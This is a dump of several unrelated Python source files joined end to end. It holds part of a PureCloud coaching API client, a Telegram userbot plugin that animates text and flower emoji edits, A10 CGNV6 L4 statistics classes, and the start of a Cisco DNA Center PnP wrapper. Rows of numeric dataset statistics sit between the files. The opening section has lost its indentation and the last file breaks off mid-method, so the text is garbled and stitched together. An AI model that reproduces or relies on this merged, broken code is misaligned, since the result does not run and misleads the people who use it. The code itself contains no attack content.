query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'statuses' in params:
query_params['statuses'] = params['statuses']
if 'facilitator_ids' in params:
query_params['facilitatorIds'] = params['facilitator_ids']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'relationships' in params:
query_params['relationships'] = params['relationships']
if 'completion_interval' in params:
query_params['completionInterval'] = params['completion_interval']
if 'overdue' in params:
query_params['overdue'] = params['overdue']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponseList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_notification(self, notification_id, **kwargs):
    """
    Get an existing notification.

    Permission not required if you are the owner of the notification.
    The request is synchronous unless a `callback` keyword argument is
    supplied, in which case the request thread is returned instead.

    :param str notification_id: The ID of the notification. (required)
    :param list[str] expand: Indicates a field in the response which should be expanded.
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingNotification, or the request thread when called asynchronously.
    """
    accepted = ['notification_id', 'expand', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_coaching_notification" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('notification_id') is None:
        raise ValueError("Missing the required parameter `notification_id` when calling `get_coaching_notification`")

    resource_path = '/api/v2/coaching/notifications/{notificationId}'.replace('{format}', 'json')
    path_params = {}
    if 'notification_id' in params:
        path_params['notificationId'] = params['notification_id']
    query_params = {}
    if 'expand' in params:
        query_params['expand'] = params['expand']

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CoachingNotification',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def get_coaching_notifications(self, **kwargs):
    """
    Retrieve the list of your notifications.

    The request is synchronous unless a `callback` keyword argument is
    supplied, in which case the request thread is returned instead.

    :param int page_number: Page number
    :param int page_size: Page size
    :param list[str] expand: Indicates a field in the response which should be expanded.
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingNotificationList, or the request thread when called asynchronously.
    """
    accepted = ['page_number', 'page_size', 'expand', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_coaching_notifications" % name
            )
        params[name] = value
    del params['kwargs']

    resource_path = '/api/v2/coaching/notifications'.replace('{format}', 'json')
    path_params = {}

    # Map python_style argument names onto their wire (camelCase) names.
    query_params = {}
    for attr, wire in (('page_number', 'pageNumber'),
                       ('page_size', 'pageSize'),
                       ('expand', 'expand')):
        if attr in params:
            query_params[wire] = params[attr]

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CoachingNotificationList',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def patch_coaching_appointment(self, appointment_id, body, **kwargs):
    """
    Update an existing appointment.

    Permission not required if you are the creator or facilitator of the
    appointment. The request is synchronous unless a `callback` keyword
    argument is supplied, in which case the request thread is returned.

    :param str appointment_id: The ID of the coaching appointment. (required)
    :param UpdateCoachingAppointmentRequest body: The new version of the appointment (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingAppointmentResponse, or the request thread when called asynchronously.
    """
    accepted = ['appointment_id', 'body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_coaching_appointment" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('appointment_id') is None:
        raise ValueError("Missing the required parameter `appointment_id` when calling `patch_coaching_appointment`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `patch_coaching_appointment`")

    resource_path = '/api/v2/coaching/appointments/{appointmentId}'.replace('{format}', 'json')
    path_params = {}
    if 'appointment_id' in params:
        path_params['appointmentId'] = params['appointment_id']
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingAppointmentResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def patch_coaching_appointment_annotation(self, appointment_id, annotation_id, body, **kwargs):
    """
    Update an existing annotation.

    You must have the appropriate permission for the type of annotation you
    are updating. Permission not required if you are the creator or
    facilitator of the appointment. The request is synchronous unless a
    `callback` keyword argument is supplied, in which case the request
    thread is returned.

    :param str appointment_id: The ID of the coaching appointment. (required)
    :param str annotation_id: The ID of the annotation. (required)
    :param CoachingAnnotation body: The new version of the annotation (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingAnnotation, or the request thread when called asynchronously.
    """
    accepted = ['appointment_id', 'annotation_id', 'body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_coaching_appointment_annotation" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('appointment_id') is None:
        raise ValueError("Missing the required parameter `appointment_id` when calling `patch_coaching_appointment_annotation`")
    if params.get('annotation_id') is None:
        raise ValueError("Missing the required parameter `annotation_id` when calling `patch_coaching_appointment_annotation`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `patch_coaching_appointment_annotation`")

    resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations/{annotationId}'.replace('{format}', 'json')

    # Map python_style argument names onto their wire (camelCase) names.
    path_params = {}
    for attr, wire in (('appointment_id', 'appointmentId'),
                       ('annotation_id', 'annotationId')):
        if attr in params:
            path_params[wire] = params[attr]
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingAnnotation',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def patch_coaching_appointment_status(self, appointment_id, body, **kwargs):
    """
    Update the status of a coaching appointment.

    Permission not required if you are an attendee, creator or facilitator
    of the appointment. The request is synchronous unless a `callback`
    keyword argument is supplied, in which case the request thread is
    returned.

    :param str appointment_id: The ID of the coaching appointment. (required)
    :param CoachingAppointmentStatusRequest body: Updated status of the coaching appointment (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingAppointmentStatusResponse, or the request thread when called asynchronously.
    """
    accepted = ['appointment_id', 'body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_coaching_appointment_status" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('appointment_id') is None:
        raise ValueError("Missing the required parameter `appointment_id` when calling `patch_coaching_appointment_status`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `patch_coaching_appointment_status`")

    resource_path = '/api/v2/coaching/appointments/{appointmentId}/status'.replace('{format}', 'json')
    path_params = {}
    if 'appointment_id' in params:
        path_params['appointmentId'] = params['appointment_id']
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingAppointmentStatusResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def patch_coaching_notification(self, notification_id, body, **kwargs):
    """
    Update an existing notification.

    Can only update your own notifications. The request is synchronous
    unless a `callback` keyword argument is supplied, in which case the
    request thread is returned.

    :param str notification_id: The ID of the notification. (required)
    :param CoachingNotification body: Change the read state of a notification (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingNotification, or the request thread when called asynchronously.
    """
    accepted = ['notification_id', 'body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_coaching_notification" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('notification_id') is None:
        raise ValueError("Missing the required parameter `notification_id` when calling `patch_coaching_notification`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `patch_coaching_notification`")

    resource_path = '/api/v2/coaching/notifications/{notificationId}'.replace('{format}', 'json')
    path_params = {}
    if 'notification_id' in params:
        path_params['notificationId'] = params['notification_id']
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingNotification',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def post_coaching_appointment_annotations(self, appointment_id, body, **kwargs):
    """
    Create a new annotation.

    You must have the appropriate permission for the type of annotation you
    are creating. Permission not required if you are related to the
    appointment (only the creator or facilitator can create private
    annotations). The request is synchronous unless a `callback` keyword
    argument is supplied, in which case the request thread is returned.

    :param str appointment_id: The ID of the coaching appointment. (required)
    :param CoachingAnnotationCreateRequest body: The annotation to add (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingAnnotation, or the request thread when called asynchronously.
    """
    accepted = ['appointment_id', 'body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_coaching_appointment_annotations" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('appointment_id') is None:
        raise ValueError("Missing the required parameter `appointment_id` when calling `post_coaching_appointment_annotations`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointment_annotations`")

    resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations'.replace('{format}', 'json')
    path_params = {}
    if 'appointment_id' in params:
        path_params['appointmentId'] = params['appointment_id']
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingAnnotation',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def post_coaching_appointment_conversations(self, appointment_id, body, **kwargs):
    """
    Add a conversation to an appointment.

    Permission not required if you are the creator or facilitator of the
    appointment. The request is synchronous unless a `callback` keyword
    argument is supplied, in which case the request thread is returned.

    :param str appointment_id: The ID of the coaching appointment. (required)
    :param AddConversationRequest body: body (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: AddConversationResponse, or the request thread when called asynchronously.
    """
    accepted = ['appointment_id', 'body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_coaching_appointment_conversations" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('appointment_id') is None:
        raise ValueError("Missing the required parameter `appointment_id` when calling `post_coaching_appointment_conversations`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointment_conversations`")

    resource_path = '/api/v2/coaching/appointments/{appointmentId}/conversations'.replace('{format}', 'json')
    path_params = {}
    if 'appointment_id' in params:
        path_params['appointmentId'] = params['appointment_id']
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='AddConversationResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def post_coaching_appointments(self, body, **kwargs):
    """
    Create a new appointment.

    The request is synchronous unless a `callback` keyword argument is
    supplied, in which case the request thread is returned.

    :param CreateCoachingAppointmentRequest body: The appointment to add (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingAppointmentResponse, or the request thread when called asynchronously.
    """
    accepted = ['body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_coaching_appointments" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointments`")

    resource_path = '/api/v2/coaching/appointments'.replace('{format}', 'json')
    path_params = {}
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingAppointmentResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def post_coaching_appointments_aggregates_query(self, body, **kwargs):
    """
    Retrieve aggregated appointment data.

    The request is synchronous unless a `callback` keyword argument is
    supplied, in which case the request thread is returned.

    :param CoachingAppointmentAggregateRequest body: Aggregate Request (required)
    :param callback: Optional function invoked with the response (makes the call async).
    :return: CoachingAppointmentAggregateResponse, or the request thread when called asynchronously.
    """
    accepted = ['body', 'callback']
    params = locals()
    # Fold **kwargs into params, rejecting anything outside the API contract.
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_coaching_appointments_aggregates_query" % name
            )
        params[name] = value
    del params['kwargs']

    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointments_aggregates_query`")

    resource_path = '/api/v2/coaching/appointments/aggregates/query'.replace('{format}', 'json')
    path_params = {}
    query_params = {}

    # Only send an Accept header when the client can negotiate one.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    auth_settings = ['PureCloud OAuth']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='CoachingAppointmentAggregateResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
| 42.520356 | 221 | 0.575701 | 6,588 | 66,842 | 5.656952 | 0.04493 | 0.038371 | 0.019883 | 0.018354 | 0.935226 | 0.924895 | 0.912767 | 0.906756 | 0.902624 | 0.898438 | 0 | 0.001027 | 0.344334 | 66,842 | 1,571 | 222 | 42.547422 | 0.849336 | 0.28708 | 0 | 0.858513 | 0 | 0 | 0.220344 | 0.059557 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022782 | false | 0 | 0.008393 | 0 | 0.053957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6a9bb4feaabc4146ae9cad7a0a273b1039ac5a17 | 2,900 | py | Python | userbot/plugins/meme.py | thecyberbyte-tech/Secktor-Userbot | 5ede9c98e4480ec48ad5dd114a5bf2da3df6dc3f | [
"MIT"
] | 44 | 2021-01-11T13:33:48.000Z | 2022-02-05T17:53:33.000Z | userbot/plugins/meme.py | Kishoth-45/TamilBot | 498a6716f897ba83975c43ce4fc18c875e6aa4ec | [
"MIT"
] | 1 | 2022-02-13T12:46:32.000Z | 2022-02-13T12:46:32.000Z | userbot/plugins/meme.py | Kishoth-45/TamilBot | 498a6716f897ba83975c43ce4fc18c875e6aa4ec | [
"MIT"
] | 59 | 2021-01-08T07:34:55.000Z | 2022-02-06T10:28:38.000Z | """
Memes Plugin for Userbot
usage: .meme someText  (each animation frame is shown for 3 seconds)
By : - @Zero_cool7870
"""
from telethon import events
import asyncio
import os
import sys
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern=r"meme"))
async def meme(event):
    """Animate a sliding banner around the given text.

    Usage: ``.meme sometext`` — repeatedly edits the message so a bar of
    13 dashes appears to slide from the left side of the text to the
    right, finishing with the bare text. Replaces the original 30
    copy-pasted edit/sleep lines with a single loop producing the exact
    same frame sequence.
    """
    if event.fwd_from:
        return
    # Drop the ".meme " command prefix (6 characters) to get the text.
    text = event.text[6:]
    delay = 3
    # Frame i has (13 - i) dashes on the left and i dashes on the right.
    for step in range(14):
        await event.edit("-" * (13 - step) + text + "-" * step)
        await asyncio.sleep(delay)
    await event.edit(text)
    await asyncio.sleep(delay)
"""
Bonus : Flower Boquee Generater
usage:- .flower
"""
@borg.on(admin_cmd(pattern=r"flower"))
async def meme(event):
    """Animate a growing flower bouquet.

    Usage: ``.flower`` — edits the message to show one rose, then two,
    up to ten. Replaces the original 20 copy-pasted edit/sleep lines with
    a loop producing the exact same frame sequence.

    NOTE(review): this handler reuses the name ``meme``, shadowing the
    handler above at module level; both stay registered because the
    decorator runs at definition time, but renaming would be clearer.
    """
    if event.fwd_from:
        return
    flower = " 🌹"
    delay = 5
    # Frames 1..9 carry a trailing space, matching the original output.
    for count in range(1, 10):
        await event.edit(flower * count + " ")
        await asyncio.sleep(delay)
    await event.edit(flower * 10)
    await asyncio.sleep(delay)
| 34.52381 | 91 | 0.637586 | 326 | 2,900 | 5.656442 | 0.150307 | 0.292842 | 0.35141 | 0.364425 | 0.848156 | 0.848156 | 0.824295 | 0.824295 | 0.824295 | 0.784165 | 0 | 0.00334 | 0.174138 | 2,900 | 83 | 92 | 34.939759 | 0.76618 | 0.034483 | 0 | 0.455882 | 0 | 0 | 0.08513 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.073529 | 0 | 0.102941 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
0a923bdaa3b779e2958847b2c360c99ae1b51cd0 | 8,059 | py | Python | a10sdk/core/cgnv6/cgnv6_l4.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 16 | 2015-05-20T07:26:30.000Z | 2021-01-23T11:56:57.000Z | a10sdk/core/cgnv6/cgnv6_l4.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 6 | 2015-03-24T22:07:11.000Z | 2017-03-28T21:31:18.000Z | a10sdk/core/cgnv6/cgnv6_l4.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 23 | 2015-03-29T15:43:01.000Z | 2021-06-02T17:12:01.000Z | from a10sdk.common.A10BaseClass import A10BaseClass
class SamplingEnable(A10BaseClass):
    """Counter-sampling selector for CGNV6 L4 statistics.

    This class does not support CRUD operations; use the parent object.

    :param counters1: Enum string naming the L4 counter to sample
        (e.g. "all", "no-fwd-route", "tcp-rst-sent",
        "out-of-session-memory", ...). The accepted values are defined
        by the AXAPI v3 schema for ``cgnv6 l4 sampling-enable``.
    :param DeviceProxy: The device proxy for REST operations and
        session handling. Refer to `common/device_proxy.py`.
    """

    def __init__(self, **kwargs):
        # Defaults expected by A10BaseClass serialization.
        self.ERROR_MSG = ""
        self.b_key = "sampling-enable"
        self.DeviceProxy = ""
        self.counters1 = ""
        # Any keyword argument becomes an attribute, overriding defaults.
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
class L4(A10BaseClass):
    """CGNV6 L4 Statistics.

    Class l4 supports CRUD operations and inherits from
    `common/A10BaseClass`. This class is the `"PARENT"` class for this
    module.

    URL for this object::

        `https://<Hostname|Ip address>//axapi/v3/cgnv6/l4`.

    :param sampling_enable: List of sampling-enable objects (see
        :class:`SamplingEnable`); each entry selects one L4 counter to
        sample, per the AXAPI v3 schema.
    :param DeviceProxy: The device proxy for REST operations and
        session handling. Refer to `common/device_proxy.py`.
    """

    def __init__(self, **kwargs):
        # Defaults expected by A10BaseClass serialization.
        self.ERROR_MSG = ""
        self.required = []
        self.b_key = "l4"
        self.a10_url = "/axapi/v3/cgnv6/l4"
        self.DeviceProxy = ""
        self.sampling_enable = []
        # Any keyword argument becomes an attribute, overriding defaults.
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
| 138.948276 | 3,459 | 0.7187 | 1,202 | 8,059 | 4.804493 | 0.124792 | 0.09697 | 0.04987 | 0.031169 | 0.904242 | 0.904242 | 0.904242 | 0.904242 | 0.892814 | 0.892814 | 0 | 0.018396 | 0.116392 | 8,059 | 57 | 3,460 | 141.385965 | 0.792585 | 0.909542 | 0 | 0.526316 | 0 | 0 | 0.050946 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7c1aa51b77622224e51bd43f1a9027593ff3e6d0 | 98,481 | py | Python | dnacentersdk/api/v1_3_3/device_onboarding_pnp.py | wastorga/dnacentersdk | 1a25aaef2eaa016fe54ebebbd7448919e0effa3f | [
"MIT"
] | null | null | null | dnacentersdk/api/v1_3_3/device_onboarding_pnp.py | wastorga/dnacentersdk | 1a25aaef2eaa016fe54ebebbd7448919e0effa3f | [
"MIT"
] | null | null | null | dnacentersdk/api/v1_3_3/device_onboarding_pnp.py | wastorga/dnacentersdk | 1a25aaef2eaa016fe54ebebbd7448919e0effa3f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""DNA Center Device Onboarding (PnP) API wrapper.
Copyright (c) 2019 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
from past.builtins import basestring
from ...restsession import RestSession
from ...utils import (
check_type,
dict_from_items_with_values,
apply_path_params,
dict_of_str,
)
class DeviceOnboardingPnp(object):
"""DNA Center Device Onboarding (PnP) API (version: 1.3.3).
Wraps the DNA Center Device Onboarding (PnP)
API and exposes the API as native Python
methods that return native Python objects.
"""
def __init__(self, session, object_factory, request_validator):
    """Initialize a new DeviceOnboardingPnp wrapper.

    Args:
        session(RestSession): The RESTful session object to be used for
            API calls to the DNA Center service.
        object_factory: Callable that wraps raw JSON responses into
            model objects.
        request_validator: Callable returning a JSON-schema validator
            for a given request id.

    Raises:
        TypeError: If the parameter types are incorrect.
    """
    # Fail fast on a wrong session type before any initialization.
    check_type(session, RestSession)
    super(DeviceOnboardingPnp, self).__init__()
    self._request_validator = request_validator
    self._object_factory = object_factory
    self._session = session
def get_sync_result_for_virtual_account(self,
                                        domain,
                                        name,
                                        headers=None,
                                        **request_parameters):
    """Return the summary of devices synced from the given smart
    account & virtual account with PnP.

    Args:
        domain(basestring): Smart Account Domain.
        name(basestring): Virtual Account Name.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    # Validate everything before touching the session.
    check_type(headers, dict)
    check_type(domain, basestring, may_be_none=False)
    check_type(name, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    # Only forward-compat parameters go in the query string here.
    query_params = dict_from_items_with_values(dict(request_parameters))
    path_params = {
        'domain': domain,
        'name': name,
    }

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-'
        'device/sacct/${domain}/vacct/${name}/sync-result',
        path_params)
    if use_custom_headers:
        json_data = self._session.get(endpoint_full_url,
                                      params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(endpoint_full_url,
                                      params=query_params)
    return self._object_factory('bpm_0a9c988445cb91c8_v1_3_3', json_data)
def un_claim_device(self,
                    deviceIdList=None,
                    headers=None,
                    payload=None,
                    active_validation=True,
                    **request_parameters):
    """Un-Claims one or more devices with specified workflow.

    Args:
        deviceIdList(list): UnclaimRequest's deviceIdList (list of
            string, objects).
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in
            the body of the Request; merged over the named arguments.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        # Same order as the generated code: Content-Type first.
        for header_name in ('Content-Type', 'X-Auth-Token'):
            if header_name in headers:
                check_type(headers.get(header_name), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    # Explicit payload entries are overridden by the raw `payload` dict.
    request_body = {
        'deviceIdList': deviceIdList,
    }
    request_body.update(payload or {})
    request_body = dict_from_items_with_values(request_body)
    if active_validation:
        self._request_validator('jsd_0b836b7b4b6a9fd5_v1_3_3')\
            .validate(request_body)

    merged_headers = self._session.headers or {}
